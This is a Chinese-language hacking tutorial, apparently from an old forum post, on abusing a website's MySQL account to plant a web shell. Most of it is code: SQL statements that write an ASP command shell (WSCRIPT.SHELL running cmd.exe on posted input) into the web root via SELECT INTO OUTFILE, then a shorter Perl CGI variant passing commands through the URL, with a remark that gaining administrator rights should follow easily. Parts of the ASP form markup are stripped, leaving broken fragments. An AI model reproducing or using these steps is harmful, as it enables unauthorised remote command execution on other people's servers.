利用mysql空密码进行攻击

　　一天,突然得到一网站的mysql的账号,并查到它的主页所在位置为c:\www\www,首先在网上下载一个cmd.asp程序,然后写一个cmd.sql程序以便进行连接,把cmd.asp上传至它的目录,cmd.sql内容如下:

[code]use test;
create table tmp(cmd TEXT);
insert into tmp values("<%@ Language=VBScript %>");
insert into tmp values("<%");
insert into tmp values("Dim oScript");
insert into tmp values("Dim oScriptNet");
insert into tmp values("Dim oFileSys, oFile");
insert into tmp values("Dim szCMD, szTempFile");
insert into tmp values("On Error Resume Next");
insert into tmp values("' -- create the COM objects that we will be using -- '");
insert into tmp values('Set oScript = Server.CreateObject("WSCRIPT.SHELL")');
insert into tmp values('Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")');
insert into tmp values('Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")');
insert into tmp values("' -- check for a command that we have posted -- '");
insert into tmp values('szCMD = Request.Form(".CMD")');
insert into tmp values('If (szCMD <> "") Then');
insert into tmp values("' -- Use a poor mans pipe ... a temp file -- '");
insert into tmp values('szTempFile = "C:\" & oFileSys.GetTempName( )');
insert into tmp values('Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)');
insert into tmp values('Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)');
insert into tmp values("End If");
insert into tmp values("%>");
insert into tmp values("");
insert into tmp values("");
insert into tmp values('

" method="POST">');
insert into tmp values('');
insert into tmp values('');
insert into tmp values("

");
insert into tmp values("

"); 

insert into tmp values('<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>'); 

insert into tmp values("
"); 

insert into tmp values("<%"); 

insert into tmp values("If (IsObject(oFile)) Then"); 

insert into tmp values("' -- Read the output from our command and remove the temp file -- '"); 

insert into tmp values("On Error Resume Next"); 

insert into tmp values("Response.Write Server.HTMLEncode(oFile.ReadAll)"); 

insert into tmp values("oFile.Close"); 

insert into tmp values("Call oFileSys.DeleteFile(szTempFile, True)"); 

insert into tmp values("End If"); 

insert into tmp values("%>"); 

insert into tmp values(""); 

insert into tmp values(""); 

select * from tmp into outfile "c:\\www\\www\\234.asp"; 

drop table tmp;[/code]

 

　　在用insert into往表里添加内容时，不能只用一个insert into将内容全部添加进去，要一行一行的加，不然就会出现错误，所以每一行都得有一个insert into. 



　　然后进行连接: 



[code]c:\mysql\bin\mysql -u user -p password -h ip  

　　如果变为: 



[code]c:\mysql\bin\[/code]

 

　　则表明建立asp文件成功!然后: 



　　http:\\www.xxx.com/234.asp

 

　　便可以得到一个普通用户的shell了!第一步成功了，成为超级用户也不会是难事吧! 



　　如果通过mysql上传CGI文件的话就不用那么长篇了, 



[code]cmd.sql: 

use test; 

create table tmp(cmd TEXT); 

insert into tmp values('system @ARGV'); 

select * from tmp into outfile "c:\\www\\www\\234.cgi"; 

drop table tmp;[/code]

 

　　然后就可以通过http:\\www.xxx.com/234.cgi?dir c:\了,同样也得到了一个普通用户的shell了。